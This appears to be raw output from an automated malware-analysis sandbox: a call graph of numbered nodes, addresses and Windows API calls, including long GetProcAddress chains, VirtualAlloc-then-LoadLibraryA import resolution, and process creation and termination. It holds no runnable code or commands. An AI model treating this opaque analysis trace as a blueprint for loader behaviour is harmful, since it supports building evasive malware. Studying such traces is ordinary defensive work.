85096a 142638->142649 142667 815ac3 Shell_NotifyIconW _memset 142639->142667 142640->142664 142670 815b29 90 API calls _memset 142641->142670 142643 814e03 142642->142643 142644 850a1a 142642->142644 142651 814e9b 142643->142651 142652 814e0e 142643->142652 142644->142626 142676 858854 59 API calls Mailbox 142644->142676 142645 850a47 142645->142626 142645->142664 142648->142664 142654 85098d SetFocus 142649->142654 142655 85096e 142649->142655 142669 815bd7 107 API calls _memset 142651->142669 142652->142626 142674 815ac3 Shell_NotifyIconW _memset 142652->142674 142653 814eab 142653->142664 142654->142664 142655->142652 142658 850977 142655->142658 142656 814e5c 142668 8034e4 DeleteObject DestroyWindow Mailbox 142656->142668 142671 80c460 10 API calls Mailbox 142658->142671 142662->142626 142665 850a0e 142675 8159d3 94 API calls _memset 142665->142675 142667->142656 142668->142664 142669->142653 142670->142653 142671->142664 142672->142637 142673->142652 142674->142665 142675->142662 142676->142662 142677->142645 142678 3ce748c 142679 3ce74ba 142678->142679 142682 3ce74c3 142678->142682 143021 3cc43ec 142679->143021 142686 3ce7ca1 142682->142686 142907 3ce7458 142682->142907 142684 3ce74f2 142685 3ce7458 LoadLibraryA 142684->142685 142687 3ce74fe 142685->142687 142688 3ce750f 142687->142688 142689 3ce7458 LoadLibraryA 142687->142689 142690 3ce7c7f 142688->142690 142693 3ce7523 142688->142693 142689->142688 142691 3ce7c84 FreeLibrary 142690->142691 142692 3ce7c90 142690->142692 142691->142692 142692->142686 142694 3ce7c95 FreeLibrary 142692->142694 142910 3ce746c GetProcAddress 142693->142910 142694->142686 142696 3ce752f 142911 3ce746c GetProcAddress 142696->142911 142698 3ce7540 142912 3ce746c GetProcAddress 142698->142912 142700 3ce7551 142913 3ce746c GetProcAddress 142700->142913 142702 3ce7562 142914 3ce746c GetProcAddress 142702->142914 142704 3ce7573 142915 3ce746c GetProcAddress 142704->142915 142706 3ce7584 142916 3ce746c GetProcAddress 142706->142916 142708 3ce7595 142917 3ce746c GetProcAddress 142708->142917 142710 3ce75a6 142918 3ce746c GetProcAddress 142710->142918 142712 3ce75b7 142919 3ce746c GetProcAddress 142712->142919 142714 3ce75c8 142920 3ce746c GetProcAddress 142714->142920 142716 3ce75d9 142921 3ce746c GetProcAddress 142716->142921 142718 3ce75ea 142922 3ce746c GetProcAddress 142718->142922 142720 3ce75fb 142923 3ce746c GetProcAddress 142720->142923 142722 3ce760c 142924 3ce746c GetProcAddress 142722->142924 142724 3ce761d 142925 3ce746c GetProcAddress 142724->142925 142726 3ce762e 142926 3ce746c GetProcAddress 142726->142926 142728 3ce763f 142927 3ce746c GetProcAddress 142728->142927 142730 3ce7650 142928 3ce746c GetProcAddress 142730->142928 142732 3ce7661 142929 3ce746c GetProcAddress 142732->142929 142734 3ce7672 142930 3ce746c GetProcAddress 142734->142930 142736 3ce7683 142931 3ce746c GetProcAddress 142736->142931 142738 3ce7694 142932 3ce746c GetProcAddress 142738->142932 142740 3ce76a5 142933 3ce746c GetProcAddress 142740->142933 142742 3ce76b6 142934 3ce746c GetProcAddress 142742->142934 142744 3ce76c7 142935 3ce746c GetProcAddress 142744->142935 142746 3ce76d8 142936 3ce746c GetProcAddress 142746->142936 142748 3ce76e9 142937 3ce746c GetProcAddress 142748->142937 142750 3ce76fa 142938 3ce746c GetProcAddress 142750->142938 142752 3ce770b 142939 3ce746c GetProcAddress 142752->142939 142754 3ce771c 142940 3ce746c GetProcAddress 142754->142940 142756 3ce772d 142941 3ce746c GetProcAddress 142756->142941 142758 3ce773e 142942 3ce746c GetProcAddress 142758->142942 142760 3ce774f 142943 3ce746c GetProcAddress 142760->142943 142762 3ce7760 142944 3ce746c GetProcAddress 142762->142944 142764 3ce7771 142945 3ce746c GetProcAddress 142764->142945 142766 3ce7782 142946 3ce746c GetProcAddress 142766->142946 142768 3ce7793 142947 3ce746c GetProcAddress 142768->142947 142770 3ce77a4 142948 3ce746c GetProcAddress 142770->142948 142772 3ce77b5 142949 3ce746c GetProcAddress 142772->142949 142774 3ce77c6 142950 3ce746c GetProcAddress 142774->142950 142776 3ce77d7 142951 3ce746c GetProcAddress 142776->142951 142778 3ce77e8 142952 3ce746c GetProcAddress 142778->142952 142780 3ce77f9 142953 3ce746c GetProcAddress 142780->142953 142782 3ce780a 142954 3ce746c GetProcAddress 142782->142954 142784 3ce781b 142955 3ce746c GetProcAddress 142784->142955 142786 3ce782c 142956 3ce746c GetProcAddress 142786->142956 142788 3ce783d 142957 3ce746c GetProcAddress 142788->142957 142790 3ce784e 142958 3ce746c GetProcAddress 142790->142958 142792 3ce785f 142959 3ce746c GetProcAddress 142792->142959 142794 3ce7870 142960 3ce746c GetProcAddress 142794->142960 142796 3ce7881 142961 3ce746c GetProcAddress 142796->142961 142798 3ce7892 142962 3ce746c GetProcAddress 142798->142962 142800 3ce78a3 142963 3ce746c GetProcAddress 142800->142963 142802 3ce78b4 142964 3ce746c GetProcAddress 142802->142964 142804 3ce78c5 142965 3ce746c GetProcAddress 142804->142965 142806 3ce78d6 142966 3ce746c GetProcAddress 142806->142966 142808 3ce78e7 142967 3ce746c GetProcAddress 142808->142967 142810 3ce78f8 142968 3ce746c GetProcAddress 142810->142968 142812 3ce7909 142969 3ce746c GetProcAddress 142812->142969 142814 3ce791a 142970 3ce746c GetProcAddress 142814->142970 142816 3ce792b 142971 3ce746c GetProcAddress 142816->142971 142818 3ce793c 142972 3ce746c GetProcAddress 142818->142972 142820 3ce794d 142973 3ce746c GetProcAddress 142820->142973 142822 3ce795e 142974 3ce746c GetProcAddress 142822->142974 142824 3ce796f 142975 3ce746c GetProcAddress 142824->142975 142826 3ce7980 142976 3ce746c GetProcAddress 142826->142976 142828 3ce7991 142977 3ce746c GetProcAddress 142828->142977 142830 3ce79a2 142978 3ce746c GetProcAddress 142830->142978 142832 3ce79b3 142979 3ce746c GetProcAddress 142832->142979 142834 3ce79c4 142980 3ce746c GetProcAddress 142834->142980 142836 3ce79d5 142981 3ce746c GetProcAddress 142836->142981 142838 3ce79e6 142982 3ce746c GetProcAddress 142838->142982 142840 3ce79f7 142983 3ce746c GetProcAddress 142840->142983 142842 3ce7a08 142984 3ce746c GetProcAddress 142842->142984 142844 3ce7a19 142985 3ce746c GetProcAddress 142844->142985 142846 3ce7a2a 142986 3ce746c GetProcAddress 142846->142986 142848 3ce7a3b 142987 3ce746c GetProcAddress 142848->142987 142850 3ce7a4c 142988 3ce746c GetProcAddress 142850->142988 142852 3ce7a5d 142989 3ce746c GetProcAddress 142852->142989 142854 3ce7a6e 142990 3ce746c GetProcAddress 142854->142990 142856 3ce7a7f 142991 3ce746c GetProcAddress 142856->142991 142858 3ce7a90 142992 3ce746c GetProcAddress 142858->142992 142860 3ce7aa1 142993 3ce746c GetProcAddress 142860->142993 142862 3ce7ab2 142994 3ce746c GetProcAddress 142862->142994 142864 3ce7ac3 142995 3ce746c GetProcAddress 142864->142995 142866 3ce7ad4 142996 3ce746c GetProcAddress 142866->142996 142868 3ce7ae5 142997 3ce746c GetProcAddress 142868->142997 142870 3ce7af6 142998 3ce746c GetProcAddress 142870->142998 142872 3ce7b07 142999 3ce746c GetProcAddress 142872->142999 142874 3ce7b18 143000 3ce746c GetProcAddress 142874->143000 142876 3ce7b29 143001 3ce746c GetProcAddress 142876->143001 142878 3ce7b3a 143002 3ce746c GetProcAddress 142878->143002 142880 3ce7b4b 143003 3ce746c GetProcAddress 142880->143003 142882 3ce7b5c 143004 3ce746c GetProcAddress 142882->143004 142884 3ce7b6d 143005 3ce746c GetProcAddress 142884->143005 142886 3ce7b7e 143006 3ce746c GetProcAddress 142886->143006 142888 3ce7b8f 143007 3ce746c GetProcAddress 142888->143007 142890 3ce7ba0 143008 3cc49f8 142890->143008 142892 3ce7bb2 142893 3ce7bc3 GetModuleFileNameA 142892->142893 142894 3cc49f8 7 API calls 142893->142894 142895 3ce7bd5 142894->142895 143014 3cc4440 142895->143014 142898 3cc49f8 7 API calls 142899 3ce7bef 142898->142899 142900 3ce7c00 GetModuleFileNameA 142899->142900 143025 3cc48c8 142907->143025 142910->142696 142911->142698 142912->142700 142913->142702 142914->142704 142915->142706 142916->142708 142917->142710 142918->142712 142919->142714 142920->142716 142921->142718 142922->142720 142923->142722 142924->142724 142925->142726 142926->142728 142927->142730 142928->142732 142929->142734 142930->142736 142931->142738 142932->142740 142933->142742 142934->142744 142935->142746 142936->142748 142937->142750 142938->142752 142939->142754 142940->142756 142941->142758 142942->142760 142943->142762 142944->142764 142945->142766 142946->142768 142947->142770 142948->142772 142949->142774 142950->142776 142951->142778 142952->142780 142953->142782 142954->142784 142955->142786 142956->142788 142957->142790 142958->142792 142959->142794 142960->142796 142961->142798 142962->142800 142963->142802 142964->142804 142965->142806 142966->142808 142967->142810 142968->142812 142969->142814 142970->142816 142971->142818 142972->142820 142973->142822 142974->142824 142975->142826 142976->142828 142977->142830 142978->142832 142979->142834 142980->142836 142981->142838 142982->142840 142983->142842 142984->142844 142985->142846 142986->142848 142987->142850 142988->142852 142989->142854 142990->142856 142991->142858 142992->142860 142993->142862 142994->142864 142995->142866 142996->142868 142997->142870 142998->142872 142999->142874 143000->142876 143001->142878 143002->142880 143003->142882 143004->142884 143005->142886 143006->142888 143007->142890 143009 3cc4a05 143008->143009 143013 3cc4a35 143008->143013 143011 3cc4a11 143009->143011 143027 3cc44b0 143009->143027 143010 3cc43ec 7 API calls 143010->143011 143011->142892 143013->143010 143015 3cc4444 143014->143015 143018 3cc4454 143014->143018 143017 3cc44b0 7 API calls 143015->143017 143015->143018 143016 3cc4482 143016->142898 143017->143018 143018->143016 143033 3cc2a48 7 API calls 143018->143033 143022 3cc440d 143021->143022 143023 3cc43f2 143021->143023 143023->143022 143034 3cc2a48 7 API calls 143023->143034 143026 3cc48cc LoadLibraryA 143025->143026 143026->142684 143028 3cc44d8 143027->143028 143029 3cc44b4 143027->143029 143028->143013 143032 3cc2a18 7 API calls 143029->143032 143031 3cc44c1 143031->143013 143032->143031 143033->143016 143034->143022 143035 801663 143036 801cd0 143035->143036 143037 8029e2 GetWindowLongW 143036->143037 143043 801ce4 143037->143043 143038 801d07 143040 801d13 143038->143040 143041 801d5f 143038->143041 143039 801dd2 DefDlgProcW 143045 801d5d 143039->143045 143044 801e8e 143040->143044 143048 801d22 143040->143048 143049 801e4d 143040->143049 143046 801d91 143041->143046 143047 801d68 143041->143047 143043->143038 143043->143039 143053 83bbe2 143043->143053 143147 88da7e 79 API calls 143044->143147 143050 801f16 143046->143050 143051 801d9f 143046->143051 143052 801f02 143047->143052 143060 801d77 143047->143060 143061 801ded 143047->143061 143054 83bc74 143048->143054 143055 801d28 143048->143055 143058 83bd02 143049->143058 143059 801e58 143049->143059 143155 88c5d8 66 API calls 143050->143155 143051->143052 143056 801da6 143051->143056 143157 88c634 141 API calls Mailbox 143052->143157 143128 801ef0 143053->143128 143144 8717a3 317 API calls 2 library calls 143053->143144 143146 88cc25 122 API calls 143054->143146 143065 801d31 143055->143065 143066 801eaa 143055->143066 143072 83bdc1 143056->143072 143073 801daf 143056->143073 143153 88d164 127 API calls 2 library calls 143058->143153 143068 801e61 143059->143068 143069 83bcf1 143059->143069 143070 801d85 143060->143070 143071 83bd1d 143060->143071 143061->143052 143062 83bd0f 143061->143062 143092 801e08 143061->143092 143154 857256 63 API calls 143062->143154 143077 801de3 143065->143077 143078 801d3a 143065->143078 143082 801eac 143066->143082 143083 801ecf 143066->143083 143079 83bcdb 143068->143079 143080 801e6a 143068->143080 143152 88cfb1 CreateProcessW CloseHandle DefDlgProcW 143069->143152 143137 801aba 76 API calls 143070->143137 143090 83bd45 143071->143090 143091 83bd25 143071->143091 143161 88cf08 DefDlgProcW 143072->143161 143086 83bdb0 143073->143086 143087 801db6 143073->143087 143076 83bc6f 143076->143045 143138 801b41 97 API calls 143077->143138 143094 801ec3 143078->143094 143095 801d43 143078->143095 143151 88cb40 6 API calls 143079->143151 143096 801e73 143080->143096 143097 83bcc5 143080->143097 143082->143045 143111 801ee5 143082->143111 143112 801eb8 143082->143112 143142 801c77 DefDlgProcW GetWindowLongW 143083->143142 143160 88cf37 DefDlgProcW 143086->143160 143100 83bd9f 143087->143100 143101 801dbf 143087->143101 143088 83bc29 143115 8029e2 GetWindowLongW 143088->143115 143088->143128 143156 88cfe6 ClientToScreen ImageList_DragMove DefDlgProcW 143090->143156 143091->143039 143091->143050 143092->143062 143105 801e0f 143092->143105 143141 801a59 DefDlgProcW PostMessageW PostMessageW GetWindowLongW 143094->143141 143095->143039 143106 801d4c 143095->143106 143107 83bcaf 143096->143107 143108 801e7f 143096->143108 143150 88d124 GetWindowLongW DefDlgProcW 143097->143150 143159 88cf66 60 API calls 143100->143159 143113 83bd93 143101->143113 143114 801dc6 143101->143114 143105->143039 143119 801e12 143105->143119 143136 80166c 7 API calls 143106->143136 143149 88c854 90 API calls 2 library calls 143107->143149 143123 801e86 143108->143123 143124 83bc98 143108->143124 143117 801ef5 143111->143117 143118 801ee8 143111->143118 143140 801a91 78 API calls 143112->143140 143158 88cca6 83 API calls 2 library calls 143113->143158 143114->143039 143126 83bd75 IsThemeActive DefDlgProcW 143114->143126 143127 83bc45 143115->143127 143143 88d040 GetWindowLongW GetWindowRect GetWindowRect MoveWindow 143117->143143 143118->143039 143118->143128 143130 8029e2 GetWindowLongW 143119->143130 143123->143039 143123->143044 143148 88de52 65 API calls 143124->143148 143126->143045 143127->143045 143127->143128 143145 88db04 9 API calls 143128->143145 143132 801e1d GetSysColor 143130->143132 143133 801e38 143132->143133 143134 801e3b SetBkColor 143132->143134 143133->143134 143139 8026a0 60 API calls 143134->143139 143136->143045 143137->143045 143138->143045 143139->143045 143140->143045 143141->143045 143142->143045 143143->143045 143144->143088 143145->143076 143146->143076 143147->143045 143148->143045 143149->143076 143150->143045 143151->143045 143152->143045 143153->143076 143154->143045 143155->143045 143156->143045 143157->143076 143158->143076 143159->143045 143160->143045 143161->143045 143162 801066 143163 80106c 143162->143163 143164 822f70 __cinit 67 API calls 143163->143164 143165 801076 143164->143165 143166 3cf7be8 143167 3cf7bff TerminateProcess 143166->143167 143168 8013c7 GetForegroundWindow 143169 8029e2 GetWindowLongW 143168->143169 143170 8013db 143169->143170 143171 8013f4 143170->143171 143172 802714 64 API calls 143170->143172 143172->143171 143173 842b43 143177 856b59 143173->143177 143175 842b4e 143176 856b59 85 API calls 143175->143176 143176->143175 143178 856b93 143177->143178 143183 856b66 143177->143183 143178->143175 143179 856b95 143189 804818 84 API calls Mailbox 143179->143189 143181 856b9a 143182 804d37 84 API calls 143181->143182 143184 856ba1 143182->143184 143183->143178 143183->143179 143183->143181 143186 856b8d 143183->143186 143185 8117e0 59 API calls 143184->143185 143185->143178 143188 804aa0 59 API calls _wcsstr 143186->143188 143188->143178 143189->143181 143190 80ac2a 143191 80ac2f 143190->143191 143192 811207 59 API calls 143191->143192 143193 80ac39 143192->143193 143211 820588 143193->143211 143197 80ac6b 143198 811207 59 API calls 143197->143198 143199 80ac75 143198->143199 143239 81fe2b 143199->143239 143201 80acbc 143202 80accc GetStdHandle 143201->143202 143203 80ad18 143202->143203 143204 842f39 143202->143204 143205 80ad20 OleInitialize 143203->143205 143204->143203 143206 842f42 143204->143206 143246 8670f3 64 API calls Mailbox 143206->143246 143208 842f49 143247 8677c2 CreateThread 143208->143247 143210 842f55 CloseHandle 143210->143205 143212 811207 59 API calls 143211->143212 143213 820598 143212->143213 143214 811207 59 API calls 143213->143214 143215 8205a0 143214->143215 143248 8110c3 143215->143248 143218 8110c3 59 API calls 143219 8205b0 143218->143219 143220 811207 59 API calls 143219->143220 143221 8205bb 143220->143221 143222 820fe6 Mailbox 59 API calls 143221->143222 143223 80ac43 143222->143223 143224 81ff4c 143223->143224 143225 81ff5a 143224->143225 143226 811207 59 API calls 143225->143226 143227 81ff65 143226->143227 143228 811207 59 API calls 143227->143228 143229 81ff70 143228->143229 143230 811207 59 API calls 143229->143230 143231 81ff7b 143230->143231 143232 811207 59 API calls 143231->143232 143233 81ff86 143232->143233 143234 8110c3 59 API calls 143233->143234 143235 81ff91 143234->143235 143236 820fe6 Mailbox 59 API calls 143235->143236 143237 81ff98 RegisterWindowMessageW 143236->143237 143237->143197 143240 85620c 143239->143240 143241 81fe3b 143239->143241 143251 86a12a 59 API calls 143240->143251 143243 820fe6 Mailbox 59 API calls 143241->143243 143245 81fe43 143243->143245 143244 856217 143245->143201 143246->143208 143247->143210 143249 811207 59 API calls 143248->143249 143250 8110cb 143249->143250 143250->143218 143251->143244 143252 11ce796 143255 11df78d 143252->143255 143262 11df9a3 143255->143262 143257 11df79c 143258 11ce7a2 143257->143258 143265 11d20b1 143257->143265 143269 11d7b6d 143257->143269 143352 11d7b2d 143257->143352 143435 11dfb3a GetPEB 143262->143435 143264 11df9af 143264->143257 143266 11d20e4 143265->143266 143437 11d2041 143266->143437 143270 11d7b75 143269->143270 143270->143270 143486 11d3799 GetModuleHandleA 143270->143486 143277 11d7bbb MessageBoxA 143279 11d7d91 143277->143279 143278 11d7bd3 143506 11d7281 143278->143506 143562 11d2371 143279->143562 143284 11d23a1 11 API calls 143286 11d7bed 143284->143286 143288 11d7c2a 143286->143288 143552 11d4855 11 API calls 143286->143552 143287 11d7db9 143291 11d2371 11 API calls 143287->143291 143289 11d7c46 143288->143289 143290 11d7c33 MessageBoxA 143288->143290 143514 11d77c5 143289->143514 143290->143289 143294 11d7dc6 143291->143294 143567 11d2e19 11 API calls 143294->143567 143295 11d7c03 143298 11d23a1 11 API calls 143295->143298 143301 11d7c10 143298->143301 143299 11d23a1 11 API calls 143302 11d7c69 143299->143302 143300 11d7dd4 143303 11d234d 11 API calls 143300->143303 143304 11d7281 15 API calls 143301->143304 143529 11d7361 143302->143529 143307 11d7ddc 143303->143307 143305 11d7c1d 143304->143305 143308 11d23a1 11 API calls 143305->143308 143568 11d2e19 11 API calls 143307->143568 143308->143288 143309 11d7c7c 143311 11d23a1 11 API calls 143309->143311 143313 11d7c89 143311->143313 143312 11d7dea 143314 11d2371 11 API calls 143312->143314 143316 11d77c5 11 API calls 143313->143316 143315 11d7df7 143314->143315 143315->143258 143317 11d7c9c 143316->143317 143318 11d23a1 11 API calls 143317->143318 143319 11d7cac 143318->143319 143320 11d7d87 143319->143320 143553 11d7981 13 API calls 143319->143553 143320->143279 143541 11d7495 143320->143541 143323 11d7cc1 143554 11d23a1 11 API calls 143323->143554 143325 11d7cce 143555 11d78f1 12 API calls 143325->143555 143327 11d7cd6 143327->143320 143328 11d7cde 143327->143328 143329 11d7361 11 API calls 143328->143329 143330 11d7cf1 143329->143330 143331 11d23a1 11 API calls 143330->143331 143332 11d7cfe 143331->143332 143556 11d7981 13 API calls 143332->143556 143334 11d7d06 143557 11d23a1 11 API calls 143334->143557 143336 11d7d13 143558 11d7a85 15 API calls 143336->143558 143338 11d7d21 143339 11d77c5 11 API calls 143338->143339 143340 11d7d34 143339->143340 143341 11d23a1 11 API calls 143340->143341 143342 11d7d44 143341->143342 143343 11d7361 11 API calls 143342->143343 143344 11d7d57 143343->143344 143345 11d23a1 11 API calls 143344->143345 143346 11d7d64 143345->143346 143559 11d7981 13 API calls 143346->143559 143348 11d7d6c 143560 11d23a1 11 API calls 143348->143560 143350 11d7d79 143561 11d7a85 15 API calls 143350->143561 143353 11d7b75 143352->143353 143353->143353 143354 11d3799 43 API calls 143353->143354 143355 11d7b86 143354->143355 143356 11d23a1 11 API calls 143355->143356 143357 11d7ba3 143356->143357 143358 11d1305 22 API calls 143357->143358 143359 11d7bb2 143358->143359 143360 11d7bbb MessageBoxA 143359->143360 143361 11d7bd3 143359->143361 143362 11d7d91 143360->143362 143363 11d7281 15 API calls 143361->143363 143364 11d2371 11 API calls 143362->143364 143365 11d7be0 143363->143365 143366 11d7dab 143364->143366 143367 11d23a1 11 API calls 143365->143367 143656 11d2e19 11 API calls 143366->143656 143369 11d7bed 143367->143369 143371 11d7c2a 143369->143371 143646 11d4855 11 API calls 143369->143646 143370 11d7db9 143374 11d2371 11 API calls 143370->143374 143372 11d7c46 143371->143372 143373 11d7c33 MessageBoxA 143371->143373 143376 11d77c5 11 API calls 143372->143376 143373->143372 143377 11d7dc6 143374->143377 143379 11d7c59 143376->143379 143657 11d2e19 11 API calls 143377->143657 143378 11d7c03 143381 11d23a1 11 API calls 143378->143381 143382 11d23a1 11 API calls 143379->143382 143384 11d7c10 143381->143384 143385 11d7c69 143382->143385 143383 11d7dd4 143386 11d234d 11 API calls 143383->143386 143387 11d7281 15 API calls 143384->143387 143389 11d7361 11 API calls 143385->143389 143390 11d7ddc 143386->143390 143388 11d7c1d 143387->143388 143391 11d23a1 11 API calls 143388->143391 143392 11d7c7c 143389->143392 143658 11d2e19 11 API calls 143390->143658 143391->143371 143394 11d23a1 11 API calls 143392->143394 143396 11d7c89 143394->143396 143395 11d7dea 143397 11d2371 11 API calls 143395->143397 143399 11d77c5 11 API calls 143396->143399 143398 11d7df7 143397->143398 143398->143258 143400 11d7c9c 143399->143400 143401 11d23a1 11 API calls 143400->143401 143402 11d7cac 143401->143402 143403 11d7d87 143402->143403 143647 11d7981 13 API calls 143402->143647 143403->143362 143404 11d7495 15 API calls 143403->143404 143404->143362 143406 11d7cc1 143648 11d23a1 11 API calls 143406->143648 143408 11d7cce 143649 11d78f1 12 API calls 143408->143649 143410 11d7cd6 143410->143403 143411 11d7cde 143410->143411 143412 11d7361 11 API calls 143411->143412 143413 11d7cf1 143412->143413 143414 11d23a1 11 API calls 143413->143414 143415 11d7cfe 143414->143415 143650 11d7981 13 API calls 143415->143650 143417 11d7d06 143651 11d23a1 11 API calls 143417->143651 143419 11d7d13 143652 11d7a85 15 API calls 143419->143652 143421 11d7d21 143422 11d77c5 11 API calls 143421->143422 143423 11d7d34 143422->143423 143424 11d23a1 11 API calls 143423->143424 143425 11d7d44 143424->143425 143426 11d7361 11 API calls 143425->143426 143427 11d7d57 143426->143427 143428 11d23a1 11 API calls 143427->143428 143429 11d7d64 143428->143429 143653 11d7981 13 API calls 143429->143653 143431 11d7d6c 143654 11d23a1 11 API calls 143431->143654 143433 11d7d79 143655 11d7a85 15 API calls 143433->143655 143436 11dfb4d 143435->143436 143436->143264 143438 11d208c 143437->143438 143439 11d2056 143437->143439 143438->143258 143439->143438 143442 11d2e7d 143439->143442 143446 11d34c9 143439->143446 143443 11d2e8d GetModuleFileNameA 143442->143443 143444 11d2ea9 143442->143444 143452 11d3111 GetModuleFileNameA RegOpenKeyExA 143443->143452 143444->143439 143447 11d34da 143446->143447 143448 11d350b 143446->143448 143447->143448 143471 11d2ec5 143447->143471 143448->143439 143453 11d3193 143452->143453 143454 11d3153 RegOpenKeyExA 143452->143454 143470 11d2f39 12 API calls 143453->143470 143454->143453 143455 11d3171 RegOpenKeyExA 143454->143455 143455->143453 143457 11d321c lstrcpyn GetThreadLocale GetLocaleInfoA 143455->143457 143461 11d334c 143457->143461 143462 11d3253 143457->143462 143458 11d31b8 RegQueryValueExA 143459 11d31d8 RegQueryValueExA 143458->143459 143460 11d31fa RegCloseKey 143458->143460 143459->143460 143463 11d31f6 143459->143463 143460->143444 143461->143444 143462->143461 143464 11d3263 lstrlen 143462->143464 143463->143460 143465 11d327c 143464->143465 143465->143461 143466 11d32aa lstrcpyn LoadLibraryExA 143465->143466 143467 11d32d6 143465->143467 143466->143467 143467->143461 143468 11d32e0 lstrcpyn LoadLibraryExA 143467->143468 143468->143461 143469 11d3316 lstrcpyn LoadLibraryExA 143468->143469 143469->143461 143470->143458 143472 11d2ef5 LoadStringA 143471->143472 143473 11d2ed9 143471->143473 143475 11d243d 143472->143475 143473->143472 143474 11d2e7d 30 API calls 143473->143474 143474->143472 143480 11d2411 11 API calls 143475->143480 143477 11d244d 143481 11d234d 143477->143481 143480->143477 143482 11d2353 143481->143482 143484 11d236e 143481->143484 143482->143484 143485 11d103d 11 API calls 143482->143485 143484->143448 143485->143484 143487 11d37cc 143486->143487 143488 11d20b1 42 API calls 143487->143488 143489 11d37d8 143488->143489 143490 11d23a1 143489->143490 143491 11d23a5 143490->143491 143494 11d23b5 143490->143494 143491->143494 143569 11d2411 11 API calls 143491->143569 143492 11d23e3 143496 11d1305 143492->143496 143494->143492 143570 11d103d 11 API calls 143494->143570 143497 11d234d 11 API calls 143496->143497 143498 11d1318 143497->143498 143499 11d133c GetCommandLineA 143498->143499 143500 11d131c GetModuleFileNameA 143498->143500 143502 11d1344 143499->143502 143501 11d243d 11 API calls 143500->143501 143503 11d133a 143501->143503 143505 11d135d 143502->143505 143571 11d11a1 143502->143571 143503->143505 143505->143277 143505->143278 143507 11d7295 143506->143507 143594 11d71e1 143507->143594 143510 11d72c4 143512 11d234d 11 API calls 143510->143512 143511 11d243d 11 API calls 143511->143510 143513 11d72d9 143512->143513 143513->143284 143515 11d77e3 143514->143515 143608 11d23e5 143515->143608 143519 11d2371 11 API calls 143521 11d78bb 143519->143521 143520 11d781a 143522 11d2e0d 11 API calls 143520->143522 143527 11d786a 143520->143527 143521->143299 143523 11d7847 143522->143523 143524 11d785d 143523->143524 143523->143527 143615 11d2709 11 API calls 143523->143615 143616 11d2749 11 API calls 143523->143616 143525 11d23a1 11 API calls 143524->143525 143525->143527 143527->143519 143530 11d736f 143529->143530 143531 11d2e0d 11 API calls 143530->143531 143532 11d739f 143531->143532 143533 11d2e0d 11 API calls 143532->143533 143534 11d73d5 143533->143534 143633 11d7311 143534->143633 143536 11d73fb 143537 11d27d9 11 API calls 143536->143537 143540 11d740c 143537->143540 143538 11d7463 143538->143309 143540->143538 143637 11d2701 143540->143637 143542 11d74b2 143541->143542 143543 11d2701 11 API calls 143542->143543 143544 11d74cb 143543->143544 143545 11d751b VirtualAlloc 143544->143545 143547 11d753e 143545->143547 143546 11d75c5 LoadLibraryA 143548 11d75d9 143546->143548 143547->143546 143549 11d7683 143547->143549 143548->143547 143550 11d763c GetProcAddress 143548->143550 143551 11d7625 GetProcAddress 143548->143551 143550->143548 143551->143548 143552->143295 143553->143323 143554->143325 143555->143327 143556->143334 143557->143336 143558->143338 143559->143348 143560->143350 143561->143320 143563 11d2377 143562->143563 143564 11d239d 143563->143564 143645 11d103d 11 API calls 143563->143645 143566 11d2e19 11 API calls 143564->143566 143566->143287 143567->143300 143568->143312 143569->143494 143570->143492 143573 11d11c1 143571->143573 143572 11d11b7 CharNextA 143572->143573 143573->143572 143574 11d11e2 143573->143574 143575 11d124e 143574->143575 143577 11d1233 CharNextA 143574->143577 143578 11d11f3 CharNextA 143574->143578 143579 11d11ff CharNextA 143574->143579 143580 11d1227 CharNextA 143574->143580 143587 11d27d9 143575->143587 143577->143574 143578->143574 143579->143574 143580->143574 143581 11d12f3 143581->143502 143582 11d12c4 CharNextA 143584 11d1259 143582->143584 143583 11d1274 CharNextA 143583->143584 143584->143581 143584->143582 143584->143583 143585 11d1280 CharNextA 143584->143585 143586 11d12b8 CharNextA 143584->143586 143585->143584 143586->143584 143588 11d27e6 143587->143588 143592 11d2816 143587->143592 143590 11d27f2 143588->143590 143593 11d2411 11 API calls 143588->143593 143589 11d234d 11 API calls 143589->143590 143590->143584 143592->143589 143593->143592 143595 11d71f6 143594->143595 143596 11d7220 CreateFileA 143595->143596 143597 11d722d GetFileSize 143596->143597 143598 11d725a 143596->143598 143603 11d100d 143597->143603 143600 11d234d 11 API calls 143598->143600 143601 11d726f 143600->143601 143601->143510 143601->143511 143604 11d102d ReadFile CloseHandle 143603->143604 143605 11d1015 143603->143605 143604->143598 143605->143604 143607 11d10b9 11 API calls 143605->143607 143607->143604 143610 11d23e9 143608->143610 143609 11d240d 143612 11d2e0d 143609->143612 143610->143609 143617 11d103d 11 API calls 143610->143617 143618 11d2c61 143612->143618 143615->143523 143616->143523 143617->143609 143619 11d2c84 143618->143619 143623 11d2c9f 143618->143623 143620 11d2c8f 143619->143620 143630 11d10b9 11 API calls 143619->143630 143631 11d2c59 11 API calls 143620->143631 143625 11d2cef 143623->143625 143632 11d10b9 11 API calls 143623->143632 143626 11d100d 11 API calls 143625->143626 143628 11d2d01 143625->143628 143626->143628 143627 11d2c9a 143627->143520 143628->143627 143629 11d2c61 11 API calls 143628->143629 143629->143628 143630->143620 143631->143627 143632->143625 143634 11d7324 143633->143634 143635 11d2e0d 11 API calls 143634->143635 143636 11d733a 143635->143636 143636->143536 143638 11d26b5 143637->143638 143639 11d26f0 143638->143639 143643 11d2411 11 API calls 143638->143643 143639->143540 143641 11d26cc 143641->143639 143644 11d103d 11 API calls 143641->143644 143643->143641 143644->143639 143645->143563 143646->143378 143647->143406 143648->143408 143649->143410 143650->143417 143651->143419 143652->143421 143653->143431 143654->143433 143655->143403 143656->143370 143657->143383 143658->143395 143659 8692c8 143660 8692d5 143659->143660 143661 8692db 143659->143661 143662 822f85 _free 58 API calls 143660->143662 143663 822f85 _free 58 API calls 143661->143663 143665 8692ec 143661->143665 143662->143661 143663->143665 143664 8692fe 143665->143664 143666 822f85 _free 58 API calls 143665->143666 143666->143664 143667 801055 143672 802a19 143667->143672 143670 822f70 __cinit 67 API calls 143671 801064 143670->143671 143673 811207 59 API calls 143672->143673 143674 802a87 143673->143674 143679 801256 143674->143679 143677 802b24 143678 80105a 143677->143678 143682 8013f8 59 API calls 2 library calls 143677->143682 143678->143670 143683 801284 143679->143683 143682->143677 143684 801291 143683->143684 143685 801275 143683->143685 143684->143685 143686 801298 RegOpenKeyExW 143684->143686 143685->143677 143686->143685 143687 8012b2 RegQueryValueExW 143686->143687 143688 8012d3 143687->143688 143689 8012e8 RegCloseKey 143687->143689 143688->143689 143689->143685 143690 801016 143695 815ce7 143690->143695 143693 822f70 __cinit 67 API calls 143694 801025 143693->143694 143696 820fe6 Mailbox 59 API calls 143695->143696 143697 815cef 143696->143697 